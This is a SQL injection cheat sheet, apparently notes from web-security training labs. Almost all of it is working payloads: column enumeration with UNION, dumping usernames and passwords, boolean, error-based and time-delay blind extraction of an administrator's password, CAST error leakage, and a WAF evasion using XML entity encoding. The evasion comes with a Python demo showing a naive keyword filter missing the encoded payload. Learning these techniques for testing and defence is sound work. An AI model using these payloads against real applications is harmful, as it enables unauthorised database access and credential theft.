'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
' # required for XML content
UNION-based SQLi
First determine the number of columns returned by the original query (increase until it errors / stops erroring):
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
#for Oracle: every SELECT needs a FROM clause, so use the built-in DUAL table
' UNION SELECT NULL FROM DUAL--
The payloads above use the double-dash comment sequence -- to comment out the remainder of the original query after the injection point.
On MySQL the double-dash sequence must be followed by a space (or it is not treated as a comment); alternatively the hash character # starts a comment.
Test which column accepts string data (the payload that does not error identifies a usable string column)
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
Retrieve multiple columns through a single string column by concatenating them (|| is Oracle/PostgreSQL syntax; MySQL uses CONCAT() unless PIPES_AS_CONCAT is enabled)
' UNION SELECT username || '~' || password FROM users--
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
Blind SQLi (boolean-based)
Start with a simple true/false condition and compare the two responses
…xyz' AND '1'='1
…xyz' AND '1'='2
#table exists (LIMIT is MySQL/PostgreSQL/SQLite syntax; Oracle uses WHERE ROWNUM=1)
xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
#user exists
xyz' AND (SELECT 'a' FROM users WHERE username = 'administrator')='a
#password length (increment until the condition is true)
xyz' AND (SELECT 'a' FROM users WHERE username = 'administrator' AND LENGTH(password)=20)='a
#password characters, one position at a time (the application's own closing quote completes the payload)
xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username = 'administrator')='b
If that works, move on to more complex conditions, e.g. a > comparison to binary-search each character instead of trying every value
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a
Error-based blind SQLi
If a true/false condition does not change the response, try to trigger a database error conditionally instead (divide by zero only when the condition holds):
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
#Oracle variant: TO_CHAR keeps both CASE branches as strings so the division is evaluated; §a§ marks the Burp Intruder payload position
xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
Error-based SQLi with visible errors
When the error message is returned to the client, use CAST to force a string value into a type it cannot convert to, so the database echoes the value in the error:
CAST((SELECT example_column FROM example_table) AS int)--
' AND 1=CAST((SELECT username FROM users) AS int)--
#a subquery returning several rows causes a different error ("more than one row returned"); add LIMIT 1 to extract one value at a time
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
Time delays (Microsoft SQL Server syntax; stacked query with ; followed by a conditional delay)
#simple condition
'; IF (1=2) WAITFOR DELAY '0:0:10'--
#user condition
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
If a WAF blocks the payload, try encoding it with the Hackvertor Burp extension (hex_entities / dec_entities tags); inside an XML body the parser decodes the entities before the value reaches the query, e.g.
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId><@hex_entities>1 union select password from users where username='administrator'<@/hex_entities></storeId></stockCheck>
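What the hex_entities / dec_entities encoding does to the XML request above, and why it works against a pattern-matching WAF. This is an added example, not Hackvertor's code or anything from the original notes: it re-implements the two encodings, builds the stock-check body with the same element names as the request above (the payload and product id are constructed for the demo), and parses the result the way the application's XML parser would, showing that the decoded storeId is the original payload while the wire bytes contain no SQL keyword or quote.

```python
"""Added example (not from the original notes): numeric-character-reference
encoding of a payload inside an XML body, and the application-side decode.
Element names mirror the stockCheck request; the payload is constructed."""
import xml.etree.ElementTree as ET


def hex_entities(s: str) -> str:
    """Every character as a hexadecimal numeric character reference (&#x..;)."""
    return "".join(f"&#x{ord(c):x};" for c in s)


def dec_entities(s: str) -> str:
    """Every character as a decimal numeric character reference (&#..;)."""
    return "".join(f"&#{ord(c)};" for c in s)


def build_stock_check(product_id: str, store_id: str, encoder=hex_entities) -> str:
    """The request body as sent on the wire, storeId encoded with `encoder`."""
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            f"<stockCheck><productId>{product_id}</productId>"
            f"<storeId>{encoder(store_id)}</storeId></stockCheck>")


def parse_store_id(body: str) -> str:
    """What the application receives: the XML parser resolves the entities."""
    root = ET.fromstring(body.encode("utf-8"))
    return root.find("storeId").text


# constructed payload, same as the one in the notes above
PAYLOAD = "1 union select password from users where username='administrator'"


def wire_contains_sql(body: str) -> bool:
    """A naive keyword/quote filter looking at the raw body sees nothing."""
    lowered = body.lower()
    return "select" in lowered or "union" in lowered or "'" in body


if __name__ == "__main__":
    for enc in (hex_entities, dec_entities):
        body = build_stock_check("1", PAYLOAD, enc)
        print(enc.__name__, "wire has SQL:", wire_contains_sql(body))
        print("  app sees:", parse_store_id(body))
```

A WAF that decodes XML entities before matching is not fooled by this; the bypass only works when the filter inspects raw bytes and the backend parser performs the decode.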